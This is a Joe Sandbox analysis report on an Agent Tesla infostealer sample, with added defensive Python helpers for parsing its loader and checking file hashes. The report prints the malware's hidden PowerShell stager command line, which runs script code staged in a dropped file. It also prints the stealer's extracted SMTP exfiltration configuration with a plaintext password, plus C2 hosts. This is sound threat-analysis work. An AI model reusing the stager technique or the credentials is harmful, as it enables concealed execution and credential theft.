Windows Analysis Report: KWOTASIE.exe

Overview - General Information

Detection
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Process tree (system w10x64; command lines were broken up by extraction and are rejoined here):
- KWOTASIE.exe (PID 6756, MD5 ECBEC21DCFA39A1131D2A79ACDF73F88)
  cmdline: "C:\Users\user\Desktop\KWOTASIE.exe"
- powershell.exe (PID 2888, MD5 C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  cmdline: "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"
- conhost.exe (PID 4292, MD5 0D698AF330FD17BEE3BF90011D49251D)
  cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- wab.exe (PID 5032, MD5 251E51E2FEDCE8BB82763D39D631EF89)
  cmdline: "C:\Program Files (x86)\windows mail\wab.exe"
- cleanup

The PowerShell command reads the dropped file Phantasies.ude into $Smitten, takes the three characters at offset 78762 as the name of a command, and dot-invokes that command with the whole file content as its argument. The dropped file therefore carries both the next-stage script and the name of the cmdlet that runs it, and nothing that looks like script code appears on the command line itself. wab.exe (Windows Contacts / Address Book, a legitimate Microsoft binary) is a common injection target; the "Memory written" and "Process created" findings under HIPS / PFW / Operating System Protection Evasion below are consistent with the payload being injected into it.
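The following triage helper is an added example and not part of the Joe Sandbox report. It recognises the read, substring, dynamic-invoke chain in a PowerShell command line and recovers the command name from a copy of the staged file. The command line and the path are the report's; the staged file is constructed here (the real Phantasies.ude is not on the page), and the assumption that the three characters spell iex (the Invoke-Expression alias) is an inference about this loader pattern, not something the report states.

```python
"""Recognise the read -> substring -> dynamic-invoke PowerShell stager from the
process tree above and recover the command name it slices out of the dropped file.

Added triage helper, not part of the Joe Sandbox report. CMDLINE is the report's
command line with the extraction spacing removed. The staged file is CONSTRUCTED
(the real Phantasies.ude is not on the page) and plants "iex" at the referenced
offset; that the three characters spell Invoke-Expression's alias is an
inference about this loader pattern, not something the report states.
"""
import re
from dataclasses import dataclass
from typing import Optional

CMDLINE = (
    r'"powershell.exe" -windowstyle hidden "$Smitten=cat '
    r"'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';"
    r'$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"'
)

# cat and gc are aliases of Get-Content; accept any of the three spellings.
_READ = re.compile(r"\$(\w+)\s*=\s*(?:cat|gc|Get-Content)\s+'([^']+)'", re.I)
_SUBSTR = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\.substring\((\d+)\s*,\s*(\d+)\)", re.I)
# Both '.' (dot-source) and '&' (call) invoke whatever command name the variable holds.
_INVOKE = re.compile(r"[.&]\s*\$(\w+)\s*\(\s*\$(\w+)\s*\)")


@dataclass
class Stager:
    path: str          # file the script is read from
    offset: int        # Substring start
    length: int        # Substring length, i.e. the hidden command name's length
    content_var: str   # variable holding the file content (also the invoke argument)
    verb_var: str      # variable holding the sliced-out command name


def parse_stager(cmdline: str) -> Optional[Stager]:
    """Return the stager's parameters if all three statements are present and
    chained through the same variables; None for unrelated PowerShell usage."""
    m_read = _READ.search(cmdline)
    m_sub = _SUBSTR.search(cmdline)
    m_call = _INVOKE.search(cmdline)
    if not (m_read and m_sub and m_call):
        return None
    content_var, path = m_read.groups()
    verb_var, sliced_from, offset, length = m_sub.groups()
    called_var, arg_var = m_call.groups()
    if sliced_from != content_var or called_var != verb_var or arg_var != content_var:
        return None
    return Stager(path, int(offset), int(length), content_var, verb_var)


def recover_verb(staged_file: bytes, stager: Stager) -> str:
    """Slice the command name exactly where the stager does. This assumes the
    staged file is a single line: Get-Content without -Raw returns one string
    per line, and the stager only works when that is a single string."""
    window = staged_file[stager.offset:stager.offset + stager.length]
    return window.decode("latin-1")


def constructed_staged_file(stager: Stager, verb: str = "iex") -> bytes:
    """CONSTRUCTED stand-in for Phantasies.ude: filler bytes with the command
    name planted at the offset the command line points to."""
    body = bytearray(b"A" * (stager.offset + 1024))
    body[stager.offset:stager.offset + len(verb)] = verb.encode("ascii")
    return bytes(body)


if __name__ == "__main__":
    s = parse_stager(CMDLINE)
    if s is None:
        print("not a substring stager")
    else:
        print(f"staged file: {s.path}  window: [{s.offset}, {s.offset + s.length})")
        print("command name in constructed file:", recover_verb(constructed_staged_file(s), s))
```

When the real dropped file is available from the sandbox, feed its bytes to recover_verb and, if the result is an execution cmdlet, the remainder of the file is the next stage to analyse. The regexes cover only the variant seen in this report (single-quoted path, Substring with two literal integers); loaders that build the offset arithmetically or split the file with other string methods need their own patterns.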
Threat name: Agent Tesla (AgentTesla)
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Extracted configuration: {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.lumies.co.za", "Username": "books@lumies.co.za", "Password": "vj$)KFsCyFOr"}

The configured SMTP host mail.lumies.co.za appears in the domain table below, resolved to 102.130.125.173 and marked malicious, so the static configuration matches what the sandbox observed on the wire.
YARA matches (the Source column, i.e. the file or memory region each rule matched, was not preserved on extraction)

Rule | Description | Author | Matches
---|---|---|---
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | 3 (distinct sources)
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | 2 (distinct sources)
Sigma matches (rule titles not preserved): one rule by frack113; one rule by Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements).
AV Detection
Avira; Avira URL Cloud; Malware Configuration Extractor; Virustotal; Integrated Neural Analysis Model.

Further signature rows whose category headings and detail columns did not survive extraction; signature types and counts in report order:
- Static PE information: 2
- Code function: 0_2_0040595A, 0_2_0040658F, 0_2_00402862
- Network: TCP traffic 2; HTTP traffic detected 4; IP Address 1; ASN Name 2; DNS query 1; UDP traffic detected without corresponding DNS query 3; DNS traffic detected 3; String found in binary or memory 19
- Code function: 0_2_004053EF, 0_2_0040333D; File created: 2
- Code function: 0_2_00406956, 0_2_00404C2C, 6_2_00334AC8, 6_2_0033EC60, 6_2_0033AD20, 6_2_00333EB0, 6_2_003341F8
- Static PE information 1; Binary or memory string 2; Static PE information 1; Classification label 1
- Code function: 0_2_0040333D, 0_2_004046B0, 0_2_004020FE; File created 1; Mutant created 2; File created 1; Static PE information 1
- WMI Queries 3; File read 1; Key opened 1; Virustotal 1; File read 1; Process created 6; Section loaded 103
- Key value queried 1; Window detected 1; File opened 1; Key opened 1; Static PE information 1
Data Obfuscation
(detail columns not preserved; signature types and counts)
- Anti Malware Scan Interface: 2
- Process created: 2
- Process information set: 158
Malware Analysis System Evasion
(detail columns not preserved; signature types and counts)
- HTTP traffic detected: 1
- WMI Queries: 10
- API/Special instruction interceptor: 1
- Binary or memory string: 5
- Memory allocated: 3
- Thread delayed: 54
- Window / User API: 4
- Thread sleep time: 52; Thread sleep count: 2
- Code function: 0_2_0040595A, 0_2_0040658F, 0_2_00402862
- API call chain: graph_0-3850
- Process information queried: 1
Anti Debugging
(detail columns not preserved; signature types and counts)
- Code function: 6_2_003370A0
- Process queried: 2
- Code function: 6_2_0033FB24
- Process token adjusted: 2
- Memory allocated: 1
HIPS / PFW / Operating System Protection Evasion
(detail columns not preserved; signature types and counts)
- Memory written: 2
- Process created: 1
- Queries volume information: 19
- Code function: 0_2_0040333D
- Key value queried: 1
Stealing of Sensitive Information
(detail columns not preserved; signature types and counts)
- File source: 5
- Key opened: 3
- File opened: 9
Remote Access Functionality
(detail columns not preserved; signature types and counts)
- File source: 3
MITRE ATT&CK matrix: techniques the sandbox flagged, by tactic. The numeric prefixes in the original are the report's signature-count badges (where several badges appeared, their digits were run together on extraction), not a single hit count. Tactics with no flagged technique: Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration; the matrix reflects only behaviour signatures that fired during the run, so the SMTP channel named in the extracted configuration does not appear under Exfiltration.
- Execution: Windows Management Instrumentation (231), PowerShell (1)
- Persistence: DLL Side-Loading (1)
- Privilege Escalation: DLL Side-Loading (1), Access Token Manipulation (1), Process Injection (111)
- Defense Evasion: Disable or Modify Tools (1), Software Packing (1), DLL Side-Loading (1), Masquerading (11), Virtualization/Sandbox Evasion (261), Access Token Manipulation (1), Process Injection (111)
- Credential Access: OS Credential Dumping (2), Credentials in Registry (1)
- Discovery: File and Directory Discovery (2), System Information Discovery (136), Security Software Discovery (631), Process Discovery (1), Virtualization/Sandbox Evasion (261), Application Window Discovery (1), System Network Configuration Discovery (1)
- Collection: Archive Collected Data (1), Data from Local System (2), Email Collection (1), Clipboard Data (1)
- Command and Control: Ingress Tool Transfer (1), Encrypted Channel (1), Non-Standard Port (1), Non-Application Layer Protocol (2), Application Layer Protocol (22)
- Impact: System Shutdown/Reboot (1)
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 3% | ReversingLabs | | |
| 9% | Virustotal | | Browse |
| 100% | Avira | HEUR/AGEN.1331786 | |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | Virustotal | | Browse |
| 0% | Virustotal | | Browse |
| 0% | Virustotal | | Browse |
| 0% | Virustotal | | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | Virustotal | | Browse |
| 0% | Avira URL Cloud | safe | |
| 100% | Avira URL Cloud | malware | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 1% | Virustotal | | Browse |
| 0% | Virustotal | | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown |
zakk.co.za | 102.218.215.35 | true | false | | unknown |
ip-api.com | 208.95.112.1 | true | true | | unknown |
mail.lumies.co.za | 102.130.125.173 | true | true | | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | unknown |
| false | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | true |
102.218.215.35 | zakk.co.za | unknown | | 36926 | CKL1-ASNKE | false |
102.130.125.173 | mail.lumies.co.za | South Africa | | 37153 | xneeloZA | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1465894 |
Start date and time: | 2024-07-02 08:12:45 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 49s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | KWOTASIE.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@6/11@3/3 |
EGA Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.85.23.86, 93.184.221.240, 20.242.39.171, 52.165.164.15
- Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
- Not all processes were analyzed; the report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
02:13:37 | API Interceptor | |
02:14:33 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
208.95.112.1 | | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | |
| | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | |
| | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
ip-api.com | | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | |
| | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | |
| | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
bg.microsoft.map.fastly.net | | Get hash | malicious | Remcos, GuLoader | Browse | |
| | Get hash | malicious | CryptOne, Vidar | Browse | |
| | Get hash | malicious | GuLoader, Remcos | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CKL1-ASNKE | | Get hash | malicious | Mirai | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Mirai | Browse | |
| | Get hash | malicious | Mirai, Moobot | Browse | |
| | Get hash | malicious | Mirai, Moobot | Browse | |
| | Get hash | malicious | Mirai, Moobot | Browse | |
| | Get hash | malicious | Mirai, Moobot | Browse | |
| | Get hash | malicious | Mirai, Moobot | Browse | |
| | Get hash | malicious | Mirai | Browse | |
| | Get hash | malicious | Mirai | Browse | |
xneeloZA | | Get hash | malicious | Mirai | Browse | |
| | Get hash | malicious | Mirai, Gafgyt | Browse | |
| | Get hash | malicious | Mirai, Gafgyt | Browse | |
| | Get hash | malicious | Mirai, Gafgyt | Browse | |
| | Get hash | malicious | Mirai, Gafgyt | Browse | |
| | Get hash | malicious | Mirai, Gafgyt | Browse | |
| | Get hash | malicious | Mirai, Gafgyt | Browse | |
| | Get hash | malicious | Gafgyt, Mirai | Browse | |
| | Get hash | malicious | Mirai | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
TUT-ASUS | | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | |
| | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | |
| | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | XWorm | Browse | |
| | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | |
| | Get hash | malicious | AgentTesla | Browse | |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 301672 |
Entropy (8bit): | 7.7512997637002945 |
Encrypted: | false |
SSDEEP: | 6144:rrNi8ksyxJSl71bC5jwYo7pT+hvRp5qdJt7oNkfU5ukZG:rpi8++1ObodT+15qdJMk85uB |
MD5: | AF97A27E9A77A40937410A3F779CDDAC |
SHA1: | 6A3422BE55263976FA91D7A0F998AA74A5280E98 |
SHA-256: | 5022B68F80E7FE5AAB1D8F15EEEADCF111A0000D890E855E73D083B5A872C0E4 |
SHA-512: | 6A8FD4BF40BD6EE2BE51BE4DB5ED5F7E57DCC1E559BA02FC19DEB4374E21B985769003C7FBFCCE2B058A7E2F006CE5158E61F238A995D6DAEA45C3CF81AE287C |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 78801 |
Entropy (8bit): | 5.142588222775932 |
Encrypted: | false |
SSDEEP: | 1536:o4Xtl8Bpx+qzIB9Sx/+6/3qt9S22qj39sL+NzfrR4LDmeOy9E4ilV6Jsp:ouULzIB9Bw3q2DL+l+me5036Cp |
MD5: | 31A731AA8D5E8D9C0A5187FF85A83CFF |
SHA1: | BBD52C93350D12B643F854D05F6156444A8FE30D |
SHA-256: | E2E9D9772728BC5C3272C18A0A4031104C88C0B8CF9507834A6881499BA12912 |
SHA-512: | 9A7E3FE4EAEC8D6C47249C0E404CDD5A621B6528B978BC5E68BB3ED4E53AD5B8B6AFE4CF9898214247E746603B387FDF4253FD4E300C655B1025F3C616CAF4E3 |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 936997 |
Entropy (8bit): | 0.298558099617445 |
Encrypted: | false |
SSDEEP: | 768:rtdyfSIjRWNERrlhGOR7gj7q9I+fZAowJIkf/nhJVPSiYLpZfuh6+LIG8Ynqr82q:T |
MD5: | 4E084DB2E273E4A59020BBC29508AE81 |
SHA1: | D868209019D2A9D9A26B1F227F04EB9B219693E3 |
SHA-256: | C083DD714E70F5CC134C4089592E54B59AB41EEAF39C5B4E8790DD833AE44D3E |
SHA-512: | C4CE5667908CEBE9EBD8D522A0EBEB22FEEA74660D50C2A455BFC725E622AADD74A7BA19A2B8049A13CFA549C35FD222D7E953F82F5040CD6A087804686783E1 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1213326 |
Entropy (8bit): | 0.29589819793966354 |
Encrypted: | false |
SSDEEP: | 768:dA50+8EyTM35Je5aQLw16j5nQstwU+4Ub4oKHJZTdyreO+R3obqx1FALllowV+ZF:VwD |
MD5: | 6EC2BDAD06DDD76E3F6C1925058D2B73 |
SHA1: | 4B5917C22D4742C3E633DEEEFE9C372B889B4D5F |
SHA-256: | 499C692019159C75D35F57BBA7424DA053F2E7E514A879CBB49EF80B1E1758EA |
SHA-512: | 0B847802F35711747788003BFB1CA9042CED842D9512FF3E5549DD68BABA81932F03F90E1FD152B4F83482FB077AE0FD15D54E84FEBB4D4FA00AA22203D37A75 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 453 |
Entropy (8bit): | 4.303279922517871 |
Encrypted: | false |
SSDEEP: | 12:+MypCFpoUASwD4bVTNXoRL8u9EEW7rJCwrxjaH8n:+MypCf9AHeVNSFEE+rJCwr93n |
MD5: | C54B2D7A94C9CFAA7CD36FBC7657E98C |
SHA1: | 3B176E45475756E5F5CBD08EECD767BDC8A3A7F4 |
SHA-256: | 3192D10054DBD993F7040DD679E45C1EEDFC5957C460A0DC5258E3DE347A1FFC |
SHA-512: | 6647715D729BDB5A3C725146BA54980A349C7AB193D1D6C1F461D0697B290ECBB6E1DA6F09CFA7448E4D034B2981940880F456295E8FA05CF4C577E7396F6534 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1323921 |
Entropy (8bit): | 0.29486482686325105 |
Encrypted: | false |
SSDEEP: | 768:zgyJwiL1/UO5DVuTBoD+ts/IoOAB3svpD6UMXB64ptzRRMBerLtyIjRFrh6ztQM/:n2WA |
MD5: | F64A268611E960C62221020057669447 |
SHA1: | 6C9C7EAE2CEF81D2368DC5B8E0E222D4EAD7089A |
SHA-256: | E33F853D9809EA1AAA0B32BAEE9249915BBBA63DD7F72A86008E5EC1F335D069 |
SHA-512: | 9356FBB9FCD2B045406A55C9779658F2314651FACC377B62D14ACC3B38E2B26309B1EBCC867AE5021F2B4ABF27BE85DE6E858837E3B940AE696D185462D1F9C4 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 987571 |
Entropy (8bit): | 0.299647195996518 |
Encrypted: | false |
SSDEEP: | 768:DSdZEZwfRWAyMufgApVv+BOXeWOJjNwq+bTEqeYvW+OHLSpgacX52fjWfd++Ler0:GbD |
MD5: | 321496DB5566568354AEE0164FE1711D |
SHA1: | 80A268D40DFCA8EAE08DE8D009853ACB05E299E8 |
SHA-256: | A8049A6F3660DA2F8DDB8E2E804BCB709C7E36085E522679F10EB6419B6CFF2B |
SHA-512: | 51E01D1EA24C66B7A82F65317946CEDCC871D1DE273C5CCCA825C06FA1D16961D9CFCF74E9C7D97DFFE1B26EE18518C323948C00C447BAE2D18584070AD7FC17 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 722954 |
Entropy (8bit): | 0.30033785621806824 |
Encrypted: | false |
SSDEEP: | 768:tbEIn2OOKGDbP6TfldCh+dtNj4htOuut2g0NTULBEEuzkur2aY:FSc |
MD5: | 97320D366F806D4009691BB49138BC55 |
SHA1: | 45DE76F8B18BA7E7871A13C0B2138A285C985DFD |
SHA-256: | D25C0746F17E0A8BE051818909EFD7340368A0E897493ED2059A8D5C33267871 |
SHA-512: | 2B38DB827EFF9D525316DA0EC02D911F9C37EB0BAA38311169EDA3110AA2F809C33A76FCC6F32931DD380C8BD067DE2344D15A50E53523FB2FA860F65B581AB9 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.840877972214509 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J |
MD5: | 106D01F562D751E62B702803895E93E0 |
SHA1: | CBF19C2392BDFA8C2209F8534616CCA08EE01A92 |
SHA-256: | 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D |
SHA-512: | 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
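Added example, not part of the Joe Sandbox report: recomputing the per-file metrics listed for each dropped file above (MD5, SHA-1, SHA-256, SHA-512 and 8-bit Shannon entropy) and matching the SHA-256 against indicators copied from that table, so the same verdicts can be reproduced on a file recovered from a host. The sample inputs in demo() are constructed, and the 7.0 entropy threshold is this example's assumption rather than a Joe Sandbox rule (the report leaves "Encrypted: false" even for the 7.75-entropy drop). One sanity check the code makes visible: the MD5 of zero bytes is d41d8cd98f00b204e9800998ecf8427e, which is exactly the MD5 the section table further down reports for .ndata, consistent with that section having a raw size of 0.

```python
"""Recompute dropped-file hashes and entropy and match them against report IOCs.
Added example, not from the report; inputs in demo() are constructed."""
import hashlib
import math
from collections import Counter

# SHA-256 values copied from the dropped-files table above.
REPORT_IOCS = {
    "E2E9D9772728BC5C3272C18A0A4031104C88C0B8CF9507834A6881499BA12912": "malicious (78801-byte drop)",
    "5022B68F80E7FE5AAB1D8F15EEEADCF111A0000D890E855E73D083B5A872C0E4": "low reputation (301672-byte drop)",
}
HIGH_ENTROPY = 7.0  # assumption of this example: above this, treat content as compressed/encrypted


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, 0.0 (constant) to 8.0 (uniform): the scale the report uses."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_metrics(data: bytes) -> dict:
    """Hashes, size, entropy and IOC verdict for one file's contents."""
    digests = {alg: hashlib.new(alg, data).hexdigest().upper()
               for alg in ("md5", "sha1", "sha256", "sha512")}
    entropy = shannon_entropy(data)
    return {
        **digests,
        "size": len(data),
        "entropy": entropy,
        "high_entropy": entropy > HIGH_ENTROPY,
        "ioc": REPORT_IOCS.get(digests["sha256"], "no match"),
    }


def demo() -> list:
    """Constructed inputs: an empty file, a two-symbol text, and every byte value once."""
    samples = {"empty": b"", "two-symbol": b"ab" * 50, "uniform": bytes(range(256))}
    return [{"label": label, **file_metrics(content)} for label, content in samples.items()]


if __name__ == "__main__":
    for row in demo():
        print(f'{row["label"]:>10}  size={row["size"]:<4} entropy={row["entropy"]:.3f}  '
              f'high={row["high_entropy"]!s:<5} md5={row["md5"]}  {row["ioc"]}')
```

Run it against the recovered drops instead of the constructed inputs by replacing the `samples` dict with `Path(...).read_bytes()` contents; an exact SHA-256 hit against REPORT_IOCS is the only strong signal here, while the entropy flag is a triage hint and nothing more.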
File type: | |
Entropy (8bit): | 7.569090830267937 |
TrID: | |
File name: | KWOTASIE.exe |
File size: | 982'616 bytes |
MD5: | ecbec21dcfa39a1131d2a79acdf73f88 |
SHA1: | 6b9366674e34118ec2881ab8d0ae5a5f5077a44d |
SHA256: | ca595e27f24e0fc84bd5627ec36baae36bcc24018e638ed2ec7c7a6b1fe7b653 |
SHA512: | 5158aa940a2779ef4fbb4874fbef55135754c33d3370f0c3f807c082dc268a63eab099f03b8b855a65bf41dd3cf683b8284b728719e6935835aa7920a5aa6b9c |
SSDEEP: | 24576:tzBRHciaGiPc8t11WID3jCJO30866tZPIJIRP6n:rRHciaGiL1MU2k3KSAJT |
TLSH: | D8250287FA284192EC0D49F146BF5C67CE15BE2155523B3A6E67BB054DF3022D23B22B |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...p..Y.................d...*..... |
Icon Hash: | 47e132531196311f |
Entrypoint: | 0x40333d |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x597FCC70 [Tue Aug 1 00:33:52 2017 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | b34f154ec913d2d2c435cbd644e91687 |
Signature Valid: | false |
